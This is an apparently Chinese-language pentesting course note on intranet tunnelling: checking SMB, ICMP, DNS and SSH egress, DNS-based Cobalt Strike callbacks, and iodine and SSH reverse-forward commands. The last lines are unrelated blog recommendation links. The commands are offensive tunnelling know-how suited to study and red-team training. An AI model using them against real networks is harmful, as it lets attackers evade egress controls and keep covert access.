内网渗透-隧道判断-SSH-DNS-icmp-smb-上线linux-mac

1.通道判断

#SMB 隧道&通讯&上线

判断:445 通讯

上线:借助通讯后绑定上线

通讯:直接 SMB 协议通讯即可

#ICMP 隧道&通讯&上线

判断:ping 命令

上线:见前面课程

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

#DNS 隧道&通讯&上线

判断:nslookup dig

1、上线环境:内网主机只出网 DNS 协议数据,解决上线

-域名申请及配置

-监听器创建及配置

-后门绑定监听器及生成

2.dns隧道上线

进行域名配置

配置cs

ttx.com 是注册域名

进入会话执行

mode dns-txt

内网主机只出网 DNS 协议数据,解决通讯

https://github.com/yarrick/iodine

判断出网:nslookup www.baidu.com

服务器:设置密码 hzy0 并创建虚拟 IP 及绑定域名指向

iodined -f -c -P hzy0 192.168.0.1 ns1.ttx.com -DD 设置密码 hzy0 并创建虚拟 IP 及绑定域名指向

客户端:连接密码 hzy0 并绑定域名指向

iodine -f -M 200 -P hzy0 ns1.ttx.com

尝试通讯尝试连接: ssh root@192.168.0.2

3.ssh隧道做内网探针

出站规则松懈:

在linux执行

将windows8080端口流量通过ssh隧道提交给vps

ssh -CfNg -R 1234:windwosip:8080 root@vps_ip

入站规则松懈:

4.linux上线cs
相关推荐
添砖java‘’5 小时前
vim高效编辑:从入门到精通
linux·编辑器·操作系统·vim
tryCbest6 小时前
CentOS部署Docker容器
linux·docker·centos
qyhua7 小时前
【Linux运维实战】彻底修复 CVE-2011-5094 漏洞
linux·运维·安全
坠金7 小时前
linux/centos迁移conda文件夹
linux·centos·conda
纳于大麓8 小时前
Kotlin基础语法
linux·windows·kotlin
九皇叔叔8 小时前
Linux Shell 正则表达式中的 POSIX 字符集:用法与实战
linux·运维·正则表达式
東雪蓮☆9 小时前
K8s 平滑升级
linux·运维·云原生·kubernetes
AKAMAI9 小时前
数据孤岛破局之战 :跨业务分析的难题攻坚
运维·人工智能·云计算
东巴图9 小时前
JavaScript性能优化实战大纲性能优化的核心目标
运维·matlab
---学无止境---9 小时前
Linux中进程创建和缓存对象初始化fork_init、proc_caches_init和buffer_init
linux